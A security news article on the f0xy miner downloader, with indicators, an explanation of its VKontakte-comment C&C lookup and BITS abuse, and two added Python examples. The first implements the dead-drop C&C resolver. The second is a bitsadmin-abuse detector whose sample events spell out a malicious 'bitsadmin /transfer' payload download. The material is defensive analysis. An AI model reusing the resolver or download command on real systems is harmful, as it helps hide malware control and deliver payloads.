Security Affairs

f0xy CPUminer malware improved with evasion techniques

Researchers at Websense are tracking the evolution of the financially motivated ‘f0xy’ malware, which keeps gaining new evasion features.

Security experts at Websense have spotted a new strain of malware dubbed “f0xy” that leverages legitimate websites and web services to carry out its malicious activity. The first f0xy sample discovered by Websense is dated January 13, 2015, but the experts confirmed that the malware has been improved since then: f0xy originally ran only on Windows Vista and later versions of Windows, while recent variants also work on Windows XP.

The name f0xy was chosen because this string appears in its executables and in the files and registry value it creates. The indicators below are the ones Websense published; note that a RunOnce value is executed once at the next logon and then deleted, so it only keeps the malware alive if the malware re-creates it on every run.

File names:
  %appdata%\Microsoft\svchost.exe
  %appdata%\Microsoft\f0xyupdate.exe
  %appdata%\Microsoft\Bot_ID

Registry key:
  HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce (value name: f0xy)

(Figure: f0xy code)

The f0xy malware can dynamically change its command-and-control (C&C) server and download and execute arbitrary files. Its authors paid particular attention to evasion techniques that hide the malicious code from both victims and security vendors.

When the researchers first analyzed the dropper, only 5 of the antivirus engines on VirusTotal detected it; at the time of writing the detection rate has risen slightly (24 of 57 engines), but it is still low.

“Websense Security Labs have discovered a new and emerging malware downloader that employs evasion techniques and downloads a cryptocurrency miner. The new malware, which we have named ‘f0xy’, is able to dynamically change its command-and-control (C&C), and download and execute arbitrary files. More interestingly, f0xy’s evasion tactics include leveraging the popular Russian social networking site VKontakte, and employing Microsoft’s Background Intelligent Transfer Service to download files,” Websense researcher Nick Griffin explained in a blog post.

The technique f0xy uses to change its C&C is notable: the operators post an encoded string as a comment on a specific VKontakte profile that the malware is hardcoded to look up, and decoding that comment yields the URL of the C&C server. Because the lookup is an ordinary HTTP request to a popular, reputable site, the traffic blends in, and the operators can move the C&C at any time simply by posting a new comment, without touching the infected machines.
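The dead-drop resolution described above, as an added example in Python that is neither the malware's code nor Websense's analysis tooling. It models both sides: the operator encoding a C&C URL into a comment, and the bot finding, decoding and validating it. The "f0xy:" marker, the base64 encoding, the comment markup and the 192.0.2.10 address are assumptions; the article only says the URL is posted as an encoded string in a comment on the profile.

```python
"""Dead-drop C&C resolution through a social-network comment (added example).
Assumptions, not from the article: the 'f0xy:' marker, base64 encoding,
the <div class="comment"> markup and the RFC 5737 address 192.0.2.10."""
import base64
import re
from typing import List, Optional

MARKER = "f0xy:"  # assumed prefix the bot searches for among ordinary comments


def operator_encode(c2_url: str) -> str:
    """Operator side: produce the comment text that points the botnet at a new C&C."""
    return MARKER + base64.b64encode(c2_url.encode("utf-8")).decode("ascii")


def extract_comments(wall_html: str) -> List[str]:
    """Pull comment bodies out of the (assumed) wall markup; real VK markup differs."""
    return [c.strip() for c in re.findall(r'<div class="comment">(.*?)</div>', wall_html, re.S)]


def resolve_c2(wall_html: str) -> Optional[str]:
    """Bot side: scan comments, decode the tagged one, accept only a plausible http(s) URL.
    Returns None when no usable comment is present, so the caller can retry later."""
    for text in extract_comments(wall_html):
        if not text.startswith(MARKER):
            continue
        try:
            url = base64.b64decode(text[len(MARKER):], validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64: an unrelated or planted comment, skip it
        if re.fullmatch(r"https?://[^\s/]+(/\S*)?", url):
            return url
        # decoded cleanly but is not a URL: also skipped
    return None


# Constructed wall page: innocuous comments, two decoys that carry the marker
# but do not yield a URL, and the operator's real pointer.
C2_URL = "http://192.0.2.10:8080/gate.php"
WALL_HTML = f"""
<div class="comment">Happy new year everyone!</div>
<div class="comment">f0xy:!!!not-base64!!!</div>
<div class="comment">f0xy:aGVsbG8=</div>
<div class="comment">{operator_encode(C2_URL)}</div>
<div class="comment">Check out my photos</div>
"""

if __name__ == "__main__":
    print("resolved C&C:", resolve_c2(WALL_HTML))
```

The validation in `resolve_c2` is what makes the scheme robust for the operator: stray or malformed comments on the profile are ignored rather than breaking the bot. For a defender the same pattern is the tell: a non-browser process on an endpoint fetching a social-network profile page, followed by connections to a host that never appeared in that page in clear, is worth an alert.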

Once the f0xy downloader lands on a machine, it uses the Microsoft Background Intelligent Transfer Service (BITS), driven through the built-in bitsadmin.exe tool, to download its payload. The choice is effective because BITS is a legitimate, signed Windows component that transfers files between a client and a server using idle network bandwidth, so neither the download process nor its traffic was treated as suspicious by antivirus solutions.

“The f0xy downloader calls upon bitsadmin.exe to download its payloads, which is the Microsoft Background Intelligent Transfer Service (BITS). BITS provides a way of using idle bandwidth to perform file transfers, meaning that bandwidth requirements from other applications are not interrupted or interfered with. Many Windows services rely upon this service, including Windows Update and Windows Defender,” the post continues.
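Detection logic for the bitsadmin.exe download pattern described above, run over constructed process-creation events. This is an added example: the rules are the editor's, not Websense's, and while the field names follow Sysmon Event ID 1 (Image, ParentImage, CommandLine) flattened to key=value, every event, path and address below is invented (198.51.100.7 is an RFC 5737 documentation address). It flags the f0xy-style chain on three independent signals and leaves an ordinary IT use of BITS alone.

```python
"""Flag suspicious bitsadmin.exe use in process-creation events (added example).
Events are constructed; Sysmon field names are real, the values are not."""
import re
from typing import Dict, List, Tuple

SAMPLE_EVENTS = [
    # 1: f0xy-style chain: a masquerading svchost.exe in %appdata% drives bitsadmin
    'EventID=1 Image=C:\\Windows\\System32\\bitsadmin.exe '
    'ParentImage=C:\\Users\\bob\\AppData\\Roaming\\Microsoft\\svchost.exe '
    'CommandLine="bitsadmin /transfer upd /download /priority high '
    'http://198.51.100.7/f0xyupdate.exe C:\\Users\\bob\\AppData\\Roaming\\Microsoft\\f0xyupdate.exe"',
    # 2: an admin listing jobs from a shell
    'EventID=1 Image=C:\\Windows\\System32\\bitsadmin.exe ParentImage=C:\\Windows\\System32\\cmd.exe '
    'CommandLine="bitsadmin /list /allusers"',
    # 3: the genuine service host
    'EventID=1 Image=C:\\Windows\\System32\\svchost.exe ParentImage=C:\\Windows\\System32\\services.exe '
    'CommandLine="C:\\Windows\\System32\\svchost.exe -k netsvcs"',
    # 4: legitimate IT use of BITS: named internal host, destination outside user-writable dirs
    'EventID=1 Image=C:\\Windows\\System32\\bitsadmin.exe ParentImage=C:\\Windows\\System32\\cmd.exe '
    'CommandLine="bitsadmin /transfer corp /download https://intranet.example.com/tools/agent.msi '
    'C:\\ProgramData\\Corp\\agent.msi"',
]

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\")


def parse_event(line: str) -> Dict[str, str]:
    """key=value fields; quoted values may contain spaces."""
    return {k: v.strip('"') for k, v in re.findall(r'(\w+)=("[^"]*"|\S+)', line)}


def find_reasons(ev: Dict[str, str]) -> List[str]:
    """Return every reason this event looks like abuse of BITS; empty list means benign."""
    reasons: List[str] = []
    image = ev.get("Image", "").lower()
    parent = ev.get("ParentImage", "").lower()
    cmd = ev.get("CommandLine", "").lower()

    if image.endswith("\\bitsadmin.exe") and "/transfer" in cmd:
        # bitsadmin /transfer <job> [...] <remote URL> <local path>
        m = re.search(r"(https?://\S+)\s+(\S+)", cmd)
        if m:
            src, dst = m.groups()
            if any(d in dst for d in USER_WRITABLE):
                reasons.append(f"BITS download into user-writable path: {dst}")
            if re.match(r"https?://\d{1,3}(\.\d{1,3}){3}", src):
                reasons.append(f"BITS source is a bare IP address: {src}")
    if any(d in parent for d in USER_WRITABLE):
        reasons.append(f"parent runs from user-writable path: {parent}")
    # a system binary name outside the system directories (f0xy drops %appdata%\Microsoft\svchost.exe)
    for role, path in (("image", image), ("parent", parent)):
        if path.endswith("\\svchost.exe") and not path.startswith(SYSTEM_DIRS):
            reasons.append(f"{role} named svchost.exe outside the system directories: {path}")
    return reasons


def scan(events: List[str]) -> List[Tuple[int, List[str]]]:
    """Index and reasons for every event that triggered at least one rule."""
    hits = []
    for idx, line in enumerate(events):
        reasons = find_reasons(parse_event(line))
        if reasons:
            hits.append((idx, reasons))
    return hits


if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS):
        print(f"event {idx + 1}:")
        for r in reasons:
            print("   ", r)
```

Process events are only half the picture: BITS jobs sit in a queue that survives reboots, so a hunt should also enumerate it on the host with `bitsadmin /list /allusers /verbose` or, in PowerShell, `Get-BitsTransfer -AllUsers`, and look for jobs whose destination is under a user profile.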

The experts confirmed the financial motivation of the operators behind the f0xy campaign: the variant uncovered by Websense drops a CPU miner built for 64-bit architectures, and the threat actors use the CoinMine.pw mining pool to coordinate the mining performed by the infected machines.

“It is clear that financial motivations remain at the forefront of cybercriminal minds, with the anonymity of cryptocurrency providing a somewhat safer route for collecting the spoils,” Griffin said. “We also expect to see a continuing growth of malware authors migrating to legitimate and reputable websites, to hide their malicious activities, and we expect plenty more evasion tactics adopted as authors continue to subvert security products.”

Pierluigi Paganini

(Security Affairs – f0xy, malware)